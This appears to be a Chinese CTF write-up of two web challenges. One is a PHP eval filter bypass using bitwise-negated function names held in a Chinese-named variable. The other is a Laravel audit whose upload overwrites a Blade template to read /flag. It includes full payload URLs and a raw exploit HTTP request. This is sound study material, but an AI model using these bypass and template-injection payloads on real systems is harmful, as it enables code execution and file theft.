广东强网杯两道Web Writeup

Share on:

@level5师傅发在群里的题目,做了两道

web4 php

http://119.61.19.212:8082/index.php

 1<?php
 2error_reporting(E_ALL^E_NOTICE^E_WARNING);
 3function GetYourFlag(){
 4    echo file_get_contents("./flag.php");
 5}
 6
 7if(isset($_GET['code'])){
 8    $code = $_GET['code'];
 9    //print(strlen($code));
10    if(strlen($code)>27){ 
11        die("Too Long.");
12    }
13
14    if(preg_match('/[a-zA-Z0-9_&^<>"\']+/',$_GET['code'])) {
15        die("Not Allowed.");
16    }
17    @eval($_GET['code']);
18}else{
19      highlight_file(__FILE__);
20}
21?>

过滤字符数字下划线等等 长度小于等于27 然后调用GetYourFlag()函数即可,可以用~按位取反

1echo urlencode(~('GetYourFlag'));

得到

1%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98

然后函数需要再取反回来

1~(%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98)

存到一个变量里,因为过滤,我们用中文来定义变量,我在这用

1echo urlencode('中');	//%E4%B8%AD

然后用变量存储我们取反回来的GetYourFlag函数,最后通过变量来调用这个函数

1$%E4%B8%AD=~(%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98);$%E4%B8%AD();

最后的payload

1view-source:http://119.61.19.212:8082/index.php?code=$%E4%B8%AD=~(%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98);$%E4%B8%AD();

web5

laravel的代码审计

路由

20190912093854

app/Http/Controllers/UserController.php 注入

20190912093943

20190912094106

密码解不出来,但是在database/factories/UserFactory.php这个工厂函数中给出来了

20190912095222

继续看 app/Http/Controllers/HomeController.php

20190912094237

登录后要从数据库中拿到key,然后才能上传文件,也就是进入[email protected]。传文件的文件名经过一层filecheck()过滤之后移动到视图模板的目录里,清晰了,通过上传覆盖原本的模板然后模板注入读flag。

20190912094545

正好/resources/views/auth/uploads/目录有一个template.blade.php模板,而路由中也有控制器去渲染这个模板。

20190912094749

20190912094834

构造表单上传之后发现上传filecheck()过滤了很多东西,不能有php <字样。

首先我们要知道laravel的blade模板是可以自定义php代码的,但是必须是如下格式

1@php
2    //
3@endphp

但是过滤了php关键字,没办法,只能去扒一扒blade的文档了,然后发现了自定义模板标签 https://laravel.com/docs/5.8/blade#extending-blade

20190912095812

牛逼,直接@filedata('/flag')就完事了。

 1POST /home/uploadss/NotAllow6171 HTTP/1.1
 2Host: 119.61.19.212:8085
 3Content-Length: 444
 4Cache-Control: max-age=0
 5Upgrade-Insecure-Requests: 1
 6Origin: null
 7Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvJNe9ABsnjeKGhDN
 8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
 9Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
10Accept-Language: zh-CN,zh;q=0.9
11Cookie: XSRF-TOKEN=eyJpdiI6IitoWjhwMm1ycmNTWFozSmZTTXJwXC9nPT0iLCJ2YWx1ZSI6IkllczhnNEZodldZbllTN0NmZDErR2I1eXF1bU9mV1wvYklManNuUnQ4YzhJcmlWQ09JVXJPXC9JNHZxVU0xRmdCY0RDbWJHelVwYjQyVjdXQ1FHVlFMMlE9PSIsIm1hYyI6IjNmMGUzZTEwYTA2ZDA2MjJjMDg4OTY5NTI4NDJjNTk2YmQ4N2U4NWYxY2E2ZjU3YWEwNTAwODllMzIyYTU4ZjAifQ%3D%3D; laravel_session=eyJpdiI6InRhRzZmenBJSmFLNHhrb0RlUE5OdVE9PSIsInZhbHVlIjoiZ01qK2JpQURoRHgxbFVrcGc4TE9PK2kycGxSTjlNRzkwK21uVDUxa3UyTW5JYXpIcWJaY2pYbXQwNDc0dklkemNjRmR0aFhZcllmTkRvQXpVUlR3d3c9PSIsIm1hYyI6IjAwMjVkODA3YmY5NDU1Y2U5MDMyMWMwMTI1MTcyMmQ1YTU5NWQzMTE0MGMxMzc0ZWM1NDU4YzQ5MWIyZjI5YTgifQ%3D%3D
12Connection: close
13
14------WebKitFormBoundaryvJNe9ABsnjeKGhDN
15Content-Disposition: form-data; name="_token"
16
17Z7VZ7FXfNzuzETtQrZ7DeAZCFtbkQl9L8e7ptVin
18------WebKitFormBoundaryvJNe9ABsnjeKGhDN
19Content-Disposition: form-data; name="files"; filename="template.blade.php"
20Content-Type: text/html
21
22@filedata('/flag')
23------WebKitFormBoundaryvJNe9ABsnjeKGhDN
24
25Content-Disposition: form-data; name="submit"
26
27Submit
28------WebKitFormBoundaryvJNe9ABsnjeKGhDN--

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。